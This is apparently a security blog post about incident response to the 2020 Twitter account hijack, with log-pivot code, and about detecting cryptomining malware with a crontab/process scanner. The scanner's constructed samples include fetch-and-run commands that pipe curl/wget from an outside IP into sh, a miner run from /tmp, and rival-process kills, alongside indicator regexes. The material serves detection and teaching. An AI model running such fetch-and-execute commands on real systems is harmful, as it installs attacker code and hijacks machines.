Learning security incident response from the Twitter event

0x01 What happened in the Twitter event

On July 16, many celebrity Twitter accounts posted Tweets containing a Bitcoin scam, and some people transferred Bitcoin to an address controlled by the attacker.

0x02 How did Twitter react when accounts controlled by the attacker posted the scam messages?

1. It immediately locked down the affected accounts and removed the Tweets posted by the attackers.

2. It limited functions such as posting Tweets and resetting passwords across many accounts, etc.

The traditional incident response method:
1. Containment, for example shutting down the server directly or stopping its services.
2. Eradication and recovery: the services are not restored until the root cause of the issue has been found.

In my view, Twitter's incident response method was:
1. Containment: stop using certain functions, rather than stopping the whole service.
2. Eradication and recovery: Twitter accepts the temporary loss of a function and immediately reviews that function's logs. Once the function is confirmed unaffected, it is restored step by step, and the logs of the next function are reviewed in the same way. This is friendlier to the business than stopping services outright.

0x03 How did Twitter analyse the event and resolve it?

Twitter hasn't published the details, so I can only guess at the analysis process. LOL

First: the attacker left many behavioural features, such as the login and Tweet records. Searching for those attack features in the application's login logs shows that the logins originated from access to internal systems and tools.
Second: read the logs of the internal systems and tools.
Finally: Twitter concluded that it was a coordinated social engineering attack against people with access to those internal tools.
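The first two analysis steps above, carried out over constructed logs as an added example (this is not part of the original post and not Twitter's own tooling). The log field layouts, the origin name "internal-admin-tool", the employee handles and the IP addresses are all assumptions; the point is the pivot: scam Tweet text -> posting session -> login origin -> internal-tool audit log.

```python
"""Pivot from scam Tweets to login origin to internal-tool logs.

Added example, not part of the original post and not Twitter's code. All log
records below are constructed; field layouts, the internal-tool name and the
employee handles are assumptions.
"""
import re
from collections import Counter, defaultdict

# Behaviour feature of the attacker: a Bitcoin address in the Tweet text.
BTC_ADDR = re.compile(r"\b(?:bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b")

# Constructed tweet log: (timestamp, account, session_id, text)
TWEET_LOG = [
    ("2020-07-15T18:40:00Z", "@celeb_a", "s-090", "New album out Friday!"),
    ("2020-07-15T20:01:10Z", "@celeb_a", "s-101",
     "I am giving back. Send BTC to bc1qexampleexampleexampleexampleexampleq and I double it"),
    ("2020-07-15T20:02:30Z", "@celeb_b", "s-102",
     "Feeling generous! Any BTC sent to bc1qexampleexampleexampleexampleexampleq is returned x2"),
    ("2020-07-15T20:03:00Z", "@celeb_c", "s-103", "Great game tonight"),
    ("2020-07-15T20:05:45Z", "@celeb_d", "s-104",
     "Double your bitcoin: bc1qexampleexampleexampleexampleexampleq, next 30 minutes only"),
]

# Constructed session/login log: session_id -> (account, login origin, source IP)
SESSION_LOG = {
    "s-090": ("@celeb_a", "ios-app", "203.0.113.5"),
    "s-101": ("@celeb_a", "internal-admin-tool", "198.51.100.23"),
    "s-102": ("@celeb_b", "internal-admin-tool", "198.51.100.23"),
    "s-103": ("@celeb_c", "web", "203.0.113.77"),
    "s-104": ("@celeb_d", "internal-admin-tool", "198.51.100.23"),
}

# Constructed internal-tool audit log: (timestamp, operator, action, target account, source IP)
TOOL_LOG = [
    ("2020-07-15T19:55:02Z", "emp_jdoe", "change_email", "@celeb_a", "198.51.100.23"),
    ("2020-07-15T19:55:40Z", "emp_jdoe", "disable_2fa", "@celeb_a", "198.51.100.23"),
    ("2020-07-15T19:58:11Z", "emp_jdoe", "change_email", "@celeb_b", "198.51.100.23"),
    ("2020-07-15T19:59:00Z", "emp_asmith", "view_profile", "@celeb_z", "10.20.30.40"),
    ("2020-07-15T20:04:20Z", "emp_rlee", "change_email", "@celeb_d", "198.51.100.23"),
    ("2020-07-15T20:04:50Z", "emp_rlee", "disable_2fa", "@celeb_d", "198.51.100.23"),
]


def find_scam_tweets(tweets):
    """Step 1a: select Tweets carrying the attacker's feature (a Bitcoin address)."""
    return [t for t in tweets if BTC_ADDR.search(t[3])]


def login_origins(scam_tweets, sessions):
    """Step 1b: look up the session behind each scam Tweet; count login origins and IPs."""
    origins = Counter()
    ips = set()
    for _, account, session_id, _ in scam_tweets:
        sess_account, origin, ip = sessions[session_id]
        if sess_account != account:
            raise ValueError(f"session {session_id} does not belong to {account}")
        origins[origin] += 1
        ips.add(ip)
    return origins, ips


def pivot_tool_log(accounts, tool_log):
    """Step 2: read the internal-tool log for actions against the compromised accounts."""
    ops_by_ip = defaultdict(set)
    actions = []
    for ts, operator, action, target, ip in tool_log:
        if target in accounts:
            actions.append((ts, operator, action, target, ip))
            ops_by_ip[ip].add(operator)
    # One source IP driving several operator accounts is itself a finding:
    # it points to a single attacker session, not independent employees.
    shared = {ip: ops for ip, ops in ops_by_ip.items() if len(ops) > 1}
    return actions, shared


def investigate(tweets=TWEET_LOG, sessions=SESSION_LOG, tool_log=TOOL_LOG):
    """Run the pivot end to end and return the facts an analyst would report."""
    scam = find_scam_tweets(tweets)
    accounts = {t[1] for t in scam}
    origins, ips = login_origins(scam, sessions)
    actions, shared = pivot_tool_log(accounts, tool_log)
    return {
        "compromised_accounts": accounts,
        "login_origins": origins,
        "posting_ips": ips,
        "operators": {a[1] for a in actions},
        "tool_actions": actions,
        "ips_shared_by_operators": shared,
    }


if __name__ == "__main__":
    for key, value in investigate().items():
        print(f"{key}: {value}")
```

Whether the operators whose handles appear in the tool log were the attackers or were socially engineered is not answered by the logs alone; that is the third step in the text, and it needs interviews and endpoint evidence. The shared source IP across two operator handles is the clue that points that way.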

Bitcoin mining malware analysis

0x01 Features of mining malware

1. It may automatically attack other servers, harvest their credentials, and use those credentials to attack further servers.

2. It keeps persistent control of the server and of the credentials it has collected.

0x02 The first mining malware script

Example:
The attack exploits a flaw in WebLogic servers to execute system commands, e.g. wget to download the mining malware. The downloaded script kills other mining malware processes and writes its own commands into the crontab file for persistence. Sometimes the script also carries vulnerability exploit modules to infect other servers.
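The behaviours listed under 0x01 and in the script description above (download-and-run from cron, killing rival miners, staging under /tmp, persistence in crontab) translate directly into hunting indicators. The following is an added example, not from the original post and not a copy of any real miner: the regexes are assumed heuristics, and the crontab and ps samples are constructed with documentation IP ranges and invented paths.

```python
"""Hunt for the mining-malware indicators described above in crontab and process data.

Added example, not from the original post. The indicator patterns are assumed
heuristics and the crontab / ps samples are constructed, not real captures.
"""
import re
from dataclasses import dataclass

# Assumed heuristics, one per behaviour in the text: download-and-run from cron,
# staging in world-writable dirs, killing rival miners, known miner/pool strings.
INDICATORS = {
    "download-and-execute": re.compile(r"\b(?:wget|curl)\b.*https?://.*\|\s*(?:ba)?sh\b", re.I),
    "stages in tmp": re.compile(r"/(?:tmp|dev/shm|var/tmp)/\S+"),
    "kills rival processes": re.compile(r"\b(?:pkill|killall)\b|\bkill\s+-9\b"),
    "miner name or pool": re.compile(r"xmrig|minerd|stratum\+tcp|cryptonight", re.I),
}


@dataclass
class Finding:
    source: str   # "crontab" or "ps"
    line: str
    tags: list


def tag_command(cmd):
    """Return the names of every indicator that matches a command string."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def scan_crontab(text):
    """Scan a user crontab (`crontab -l` output: 5 schedule fields + command, or @reboot)."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comment or environment assignment such as PATH=...
        if line.startswith("@"):
            cmd = line.split(None, 1)[1] if " " in line else ""
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            cmd = fields[5]
        tags = tag_command(cmd)
        if tags:
            findings.append(Finding("crontab", line, tags))
    return findings


def scan_processes(ps_text, cpu_threshold=80.0):
    """Scan `ps -eo pid,pcpu,user,args` output; miners also show as sustained high CPU."""
    findings = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 3)
        if len(fields) < 4:
            continue
        _pid, pcpu, _user, args = fields
        tags = tag_command(args)
        if float(pcpu) >= cpu_threshold:
            tags.append("high cpu")
        if tags:
            findings.append(Finding("ps", line.strip(), tags))
    return findings


# Constructed samples (documentation IP ranges, invented paths and names).
SAMPLE_CRONTAB = """\
# constructed sample, not a real capture
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL http://198.51.100.7/x.sh || wget -qO- http://198.51.100.7/x.sh) | sh
*/5 * * * * pkill -9 -f minerd; /tmp/.cache/xmrig -c /tmp/.cache/config.json
@reboot /tmp/.X11-unix/kthreaddk -o stratum+tcp://203.0.113.9:3333 --donate-level 1
"""

SAMPLE_PS = """\
  PID %CPU USER     COMMAND
    1  0.0 root     /sbin/init
  842  1.2 postgres postgres: checkpointer
 2117 97.3 weblogic /tmp/.cache/xmrig -c /tmp/.cache/config.json
 2301  0.0 weblogic /bin/sh -c (curl -fsSL http://198.51.100.7/x.sh) | sh
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB) + scan_processes(SAMPLE_PS):
        print(f"[{f.source}] {', '.join(f.tags)}: {f.line}")
```

On a live host you would feed it `crontab -l` for every user plus /etc/crontab and /etc/cron.d (those system files carry an extra user field before the command, which this user-crontab parser does not handle) and `ps -eo pid,pcpu,user,args`. A cron entry that downloads and pipes to sh is the persistence mechanism the text describes, and is worth preserving as evidence before the host is rebuilt.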